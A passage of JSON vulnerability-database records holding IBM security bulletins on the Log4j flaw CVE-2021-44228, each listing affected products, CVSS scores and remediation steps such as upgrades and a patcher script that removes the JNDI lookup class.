"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-30T16:12:28", "description": "## Summary\n\nIBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit. \n\n## Vulnerability Details\n\nOEM partner ThycoticCentrify, after conducting extensive research product code base, it is determined that **none** of the products outlined below are using the vulnerable Java library `log4j` with JNDI exploit (CVE-2021-44228). Additionally, **none** of the products outlined below are built on the Java programming language, preventing the library to be present.\n\n * IBM Security Verify Privilege Vault\n * IBM Security Verify Privilege Manager\n * IBM Security Verify Privilege Account Lifecycle Manager\n * IBM Security Verify Privilege Behavior Analytics\n * IBM Security Verify Privilege DevOps Vault\n * IBM Security Verify Privilege Vault Remote\n * IBM Security Verify Privilege Server Suite\n\n### [](<https://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md#integrations>)\n\n## ", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T13:37:26", "type": "ibm", "title": "Security Bulletin: IBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:26", "id": "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "href": "https://www.ibm.com/support/pages/node/6525770", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:11:51", "description": "## Summary\n\nIBM Security Directory Integrator NOT Affected by CVE-2021-44228 Exploit. \n\n## Vulnerability Details\n\nAfter conducting extensive research on product code base, it is determined that all versions of** **IBM Security Directory Integrator are **not **vulnerable to Java library Apache `log4j` v2 with JNDI exploit (CVE-2021-44228).\n\n### [](<https://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md#integrations>)\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T04:19:55", "type": "ibm", "title": "Security Bulletin: IBM Security Directory Integrator NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T04:19:55", "id": "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "href": "https://www.ibm.com/support/pages/node/6527078", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:02:55", "description": "## Summary\n\nIBM Watson Knowledge Catalog in Cloud Pak for Data is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228) and is used for logging. Customers are encouraged to take quick action to update their systems to Apache Log4j 2.15.0. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Knowledge Catalog in Cloud Pak for Data| \n\n4.0 (all previous refreshes)\n\n3.5.7 and previous refreshes \n \n## Remediation/Fixes\n\n** IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nInstall Watson Knowledge Catalog 4.0.4 (Refresh 4) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=new-watson-knowledge-catalog>\n\nInstall Watson Knowledge Catalog 3.5.8 (Refresh 11) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=new-watson-knowledge-catalog>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T11:39:47", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability impacts IBM Watson Knowledge Catalog in Cloud Pak for Data (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-21T11:39:47", "id": "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "href": "https://www.ibm.com/support/pages/node/6537024", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:05:03", "description": "## Summary\n\nApache log4j 2 library is used by IBM Maximo Application Suite internal components. This bulletin provides remediation for the Apache log4j 2 vulnerability (CVE-2021-44228) by applying a new Maximo Application suite fixpack. The fix includes Apache Log4j2 2.15.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Maximo Application Suite| 8.5 \nIBM Maximo Application Suite| 8.6 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now. **\n\n**Affected Version(s) \n**| **Remediation / Fix and Instructions** \n---|--- \n8.5| \n\nFixcentral IBM Maximo Application Suite 8.5.2\n\n\\- [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ETivoli&amp;product=ibm/Tivoli/IBM+Maximo+Application+Suite&amp;release=8.5.1&amp;platform=Linux&amp;function=fixId&amp;fixids=8.5.2-IBM-MAS-FP0001&amp;includeRequisites=1&amp;includeSupersedes=0&amp;downloadMethod=http](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/IBM+Maximo+Application+Suite&release=8.5.1&platform=Linux&function=fixId&fixids=8.5.2-IBM-MAS-FP0001&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n8.6| \n\nFixcentral Maximo Application Suite 8.6.1\n\n\\- [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ETivoli&amp;product=ibm/Tivoli/IBM+Maximo+Application+Suite&amp;release=8.6.0&amp;platform=Linux&amp;function=fixId&amp;fixids=8.6.1-IBM-MAS-FP0001&amp;includeRequisites=1&amp;includeSupersedes=0&amp;downloadMethod=http](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/IBM+Maximo+Application+Suite&release=8.6.0&platform=Linux&function=fixId&fixids=8.6.1-IBM-MAS-FP0001&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n \n \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T18:56:25", "type": "ibm", "title": "Security Bulletin: IBM Maximo Application Suite is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T18:56:25", "id": "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "href": "https://www.ibm.com/support/pages/node/6558944", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:11:07", "description": "## Summary\n\nVulnerabilities detected in Apache Log4j versions before v2.16.0 affects IBM Observability with Instana. These have been addressed in both the Server and Agent components.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Observability with Instana (OnPrem)| All \n \n\n\n## Remediation/Fixes\n \n \n Update your existing installation of IBM Observability with Instana as described here: <https://www.ibm.com/docs/en/owi/215?topic=premises-container-based-installation#upgrade-your-package-based-to-container-based-installation>\n \n Instana Agent update\n Update our Instana Agent installation to the latest available version.\n Latest available agent packages and agent docker images ship with an update for the current Log4j CVE.\n The respective versions are:\n - DEB & RPM packages: versions with a timestamp 2021-12-11 20:58 or later\n - Windows installer (JVM included): versions with a timestamp 2021-12-13 09:29 or later\n - Windows ZIP (JVM excluded): versions with a timestamp 2021-12-11 20:33 or later\n - Dynamic agent image: 1.215.24 & 1.215.24-j9, latest, latest-j9 or later\n - Static agent image:\u00a0 1.215.24 & 1.215.24-j9, latest, latest-j9 or later\n \n Please follow Agent installation steps to (re-)install the latest Agent version as described here: <https://www.ibm.com/docs/en/owi/215?topic=agent-installation-requirements>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-11T20:10:06", "type": "ibm", "title": "Security Bulletin: Vulnerabilitiy in Apache Log4jaffects IBM Observability with Instana - Server and Agents (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-11T20:10:06", "id": "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "href": "https://www.ibm.com/support/pages/node/6528994", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:07:59", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. IBM Spectrum Protect Snapshot on Windows includes the IBM Spectrum Protect Backup-Archive Cliient which installs the vulnerable Log4j files. Based on current information and analysis, Log4j is not used by IBM Spectrum Protect Snapshot on Wiindows.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Snapshot for Windows (formerly IBM Tivoli Storage FlashCopy Manager for Windows)| 8.1.11.0-8.1.13.0 \nIBM Tivoli Storage FlashCopy Manager for Windows| \n\n4.1.6.10-4.1.6.x \n \nNote: IBM Spectrum Protect Snapshot for Windows packages the IBM Spectrum Protect Backup-Archive client which installs the affected Log4j files but these files are not used. \n\n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading.\n\n**Note: The below fix packages included Log4j 2.15.**\n\n**IBM Spectrum Protect** \n**Snapshot for Windows Affected Versions**| **Fixing** \n**Level**| **Platform**| **Link to Fix and Instructions \n** \n---|---|---|--- \n8.1.11.0-8.1.13.0| 8.1.13.1| Windows| <https://www.ibm.com/support/pages/node/6527298> \n4.1.6.10-4.1.6.x| | Windows| \n\nApply the IBM Spectrum Protect Client 7.1.8.13 fix using this link \n<https://www.ibm.com/support/pages/node/316619> \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:37:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Protect Snapshot on Windows (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-01T11:37:31", "id": "10DF54AA6E02F56E5A696B90CA92AA8E0E7F033CECD731E6AF976A827BD42316", "href": "https://www.ibm.com/support/pages/node/6527836", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:09:44", "description": "## Summary\n\nIBM products for Cloudera Data Platform and Hortonworks Data Platform are affected by critical Apache Log4j vulnerability (CVE-2021-44228). A malicious user could exploit this vulnerability to run arbitrary code as the user or service account running the affected software. The fix includes Apache Log4j v2.16.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Product(s)**| **Version(s)** \n---|--- \nHortonworks Data Platform (HDP) with IBM| 3.0, 3.0.1 \n \nCloudera Data Platform (CDP) with IBM\n\n * Includes Cloudera Data Hub (CDH) and Cloudera Manager (CM)\n| 7.0 - 7.1.7 \n \n## Remediation/Fixes\n\n**Customers are encouraged to act swiftly to resolve this issue.**\n\n**Apply hotfix**\n\nDownload all files from this repo: <https://github.com/cloudera/cloudera-scripts-for-log4j>\n\n## Steps\n\nRun the following script on all affected cluster nodes.\n\n**NOTE**: After applying the Short Term Resolution, if you add a node, you will need to re-apply the Short Term Resolution again on the new nodes.\n\n**Script: run_log4j_patcher.sh [cdp|cdh|hdp]**\n\n**Function:** The run_log4j_patcher.sh script scans a directory for jar files and removes JndiLookup.class from the ones it finds. Do not run any other script in the downloaded directory--they will be called by run_log4j_patcher.sh automatically.\n\n 1. Stop all running jobs in the production cluster before executing the script\n 2. Navigate to **Cloudera Manager &gt; YARN** &gt; Configuration and ensure that yarn.nodemanager.delete.debug-delay-sec is set to 0 If the value is not zero, you must restart the YARN service after setting the value to 0\n 3. Navigate to **Cloudera Manager &gt; YARN** &gt; Configuration and search for yarn.nodemanager.local-dirs to get the configured Node Manager Local Directory path\n 4. Remove filecache and usercache folder located inside the folders that are specified in yarn.nodemanager.local-dirs\n 5. Download all files from the GitHub repo and copy to all nodes of your cluster.\n 6. Run the script as root on ALL nodes of your cluster. \na. Script will take 1 mandatory argument (cdh|cdp|hdp) \nb. The script takes 2 optional arguments: a base directory to scan in, and a backup directory. The default for both are /opt/cloudera and /opt/cloudera/log4shell-backup, respectively. These defaults work for CM/CDH 6 and CDP 7. A different folder will be updated for HDP.\n 7. Ensure that the last line of the script output indicates \u2018Finished\u2019 to verify that the job has completed successfully. The script will fail if a command exits unsuccessfully.\n 8. Restart Cloudera Manager Server, all clusters, and all running jobs and queries.\n\n**Usage: $PROG (subcommand) [options] **\n\n**Subcommands:**\n\n * help Prints this message\n * cdh Scan a CDH cluster node\n * cdp Scan a CDP cluster node\n * hdp Scan a HDP cluster node\n\n**Options (cdh and cdp subcommands only):**\n\n-t &lt;targetdir&gt; Override target directory (default: distro-specific) \n-b &lt;backupdir&gt; Override backup directory (default: /opt/cloudera/log4shell-backup)\n\n**Environment Variables (cdh and cdp subcommands only):**\n\nThe SKIP_* environment variables should only be used if you are running the script again and want to skip phases that have already completed. \nSKIP_JAR If non-empty, skips scanning and patching .jar files \nSKIP_TGZ If non-empty, skips scanning and patching .tar.gz files\n\nSKIP_HDFS* If non-empty, skips scanning and patching .tar.gz files in HDFS\n\nRUN_SCAN If non-empty, runs a final scan for missed vulnerable files.\n\nThis can take several hours.\n\n**NOTE**: CDH/CDP Parcels: The script removes the affected class from all CDH/CDP parcels already installed under /opt/cloudera. This script needs to be re-run after new parcels are installed or after upgrading to versions of CDH/CDP that do not include the long-term fix.\n\n**Removing affected classes from Oozie Shared Libraries (CDH &amp; CDP)**\n\nThe vulnerability affects client libraries uploaded in HDFS by Cloudera Manager. The script takes care of Tez and MapReduce libraries however Oozie libraries will need to be updated manually. The following section only applies to Cloudera Data Hub and Cloudera Data Platform releases.\n\nFollow the instructions below to secure the Oozie shared libraries:\n\n1\\. Execute the run_log4j_patcher.sh on the affected cluster.\n\n2\\. Navigate to Cloudera Manager &gt; Oozie &gt; Actions -&gt; \u201cInstall Oozie ShareLib\u201d to re-upload the Oozie libraries in the HDFS from Cloudera Manager. \nIMPORTANT: Ensure that the Oozie service is running prior to executing the command.\n\n**Removing affected classes from Oozie Shared Libraries (HDP)**\n\nRun these commands to update Oozie share lib:\n \n \n su oozie\n kinit oozie /usr/hdp/current/oozie-server/bin/oozie-setup.sh sharelib\n create -fs hdfs://ns1\n oozie admin -oozie http(s)://<oozie-host/loadbalancer>:11(000|443)/oozie\n -sharelibupdate\n \n\n**For the latest updates from Cloudera**, refer to [Resolution for TSB-545 - Private Cloud](<https://my.cloudera.com/knowledge/Title-Resolution-for-TSB-545---Critical-vulnerability-in?id=332012>).\n\nKnown Limitations: Cloudera Data Hub clusters using packages rather than parcels are not yet supported with this fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T14:19:15", "type": "ibm", "title": "Security Bulletin: Cloudera Data Platform is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-17T14:19:15", "id": "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "href": "https://www.ibm.com/support/pages/node/6541046", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:03:22", "description": "## Summary\n\nThe following security vulnerability has been identified in the WebSphere Application Server. Apache Log4j 2.x is not used by IBM Tivoli Composite Application Manager for Application Diagnostics, but log4j-1.2.4.jar is present in one of the ear files installed on WebSphere Application Server and should be removed from the installation.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nTivoli Composite Application Manager for Application Diagnostics| 7.1.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading.\n\n1\\. Follow the WebSphere security bulletin, <https://www.ibm.com/support/pages/node/6525706> to update WebSphere Application Servers. \n\n2\\. The image of IBM Tivoli Composite Application Manager for Application Diagnostics Managing Server 7.1.0.4.4 has been refreshed to remove the log4j-1.2.4.jar library.\n\nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n7.1.0.4-TIV-ITCAMAD-IF0004| 7.1 Fix Pack 4 IFix 4| <https://www.ibm.com/support/pages/node/586141> \n \n## Workarounds and Mitigations\n\nOne ear file, Itcamdata.ear in IBM Tivoli Composite Application Manager for Application Diagnostics Managing Server includes log4j-1.2.4.jar library. Itcamdata.ear is not in use any more and should be removed from the system where the Managing Server is installed. Procedure to remove Itcamdata.ear :\n\n1) Bring up the WebSphere application server console where MSVE is installed. \n\n2) Go to Applications ==&gt; Application Types ==&gt; WebSphere enterprise applications, select Itcamdata application, stop and then uninstall it. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T01:17:21", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j affects IBM Tivoli Composite Application Manager for Application Diagnostics (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T01:17:21", "id": "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "href": "https://www.ibm.com/support/pages/node/6528302", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:12:11", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Insurance Information Warehouse. This affects the Industry Models - Glossary Tools optional component. The fix includes Apache Log4j v2.15.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. 